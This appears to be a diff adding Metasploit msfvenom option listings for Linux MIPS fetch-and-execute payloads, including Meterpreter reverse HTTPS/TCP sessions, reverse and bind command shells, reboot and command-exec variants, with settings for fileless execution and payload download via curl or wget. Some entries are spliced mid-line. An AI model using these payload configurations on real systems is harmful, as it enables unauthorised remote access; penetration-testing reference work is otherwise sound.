OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter_reverse_https.txt
+106
View File
@@ -0,0 +1,106 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/mipsbe/meterpreter_reverse_https
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 108
Rank: Normal
Provided by:
B
Evasion options for payload/cmd/linux/http/mipsbe/meterpreter_reverse_https:
=========================
@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME ICLFrRDOUN no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSBE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter_reverse_tcp.txt
+97
View File
@@ -0,0 +1,97 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/mipsbe/meterpreter_reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Adam Cammack <adam_cammack@rapid7.com>
Brent Cook <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME QibeYbciB no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSBE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-mipsbe-reboot.txt
+69
View File
@@ -0,0 +1,69 @@
Name: HTTP Fetch, Linux Reboot
Module: payload/cmd/linux/http/mipsbe/reboot
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Michael Messner <devnull@s3cur1ty.de>
rigan - <imrigan@gmail.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME vwzXdDryf no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSBE payload from an HTTP server.
A very small shellcode for rebooting the system.
This payload is sometimes helpful for testing purposes or executing
other payloads that rely on initial startup procedures.
Name Current Setting Required Description
---- --------------- -------- -----------
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-mipsbe-shell-reverse_tcp.txt
+91
View File
@@ -0,0 +1,91 @@
Name: HTTP Fetch, Linux Command Shell, Reverse TCP Stager
Module: payload/cmd/linux/http/mipsbe/shell/reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 108
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
juan vazquez <juan.vazquez@metasploit.com>
tkmru
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME uTHuAvxylJ no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSBE payload from an HTTP server.
Spawn a command shell (staged).
Connect back to the attacker
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableStageEncoding false no Encode the second stage payload
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-mipsbe-shell_bind_tcp.txt
+74
View File
@@ -0,0 +1,74 @@
Name: HTTP Fetch, Linux Command Shell, Bind TCP Inline
Module: payload/cmd/linux/http/mipsbe/shell_bind_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 108
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
scut
vaicebine
Vlatko Kosturjak
juan vazquez <juan.vazquez@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LPORT 4444 yes The listen port
RHOST no The target address
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME EtbkdTGdbo no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSBE payload from an HTTP server.
Listen for a connection and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-mipsbe-shell_reverse_tcp.txt
+79
View File
@@ -0,0 +1,79 @@
Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline
Module: payload/cmd/linux/http/mipsbe/shell_reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 114
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
rigan <imrigan@gmail.com>
juan vazquez <juan.vazquez@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME LTdmakIVHUuT no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSBE payload from an HTTP server.
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-mipsle-exec.txt
+70
View File
@@ -0,0 +1,70 @@
Name: HTTP Fetch, Linux Execute Command
Module: payload/cmd/linux/http/mipsle/exec
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 111
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Michael Messner <devnull@s3cur1ty.de>
entropy <entropy@phiral.net>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CMD yes The command string to execute
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME BHtMUdPnuAr no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSLE payload from an HTTP server.
A very small shellcode for executing commands.
This module is sometimes helpful for testing purposes as well as
on targets with extremely limited buffer space.
Name Current Setting Required Description
---- --------------- -------- -----------
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter-reverse_tcp.txt
+100
View File
@@ -0,0 +1,100 @@
Name: HTTP Fetch, Reverse TCP Stager
Module: payload/cmd/linux/http/mipsle/meterpreter/reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 108
Rank: Norm
Evasion options for payload/cmd/linux/http/mipsle/meterpreter/reverse_tcp:
=========================
juan vazquez <juan.vazquez@metasploit.com>
tkmru
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME UlqevxizRg no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSLE payload from an HTTP server.
Connect back to the attacker
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
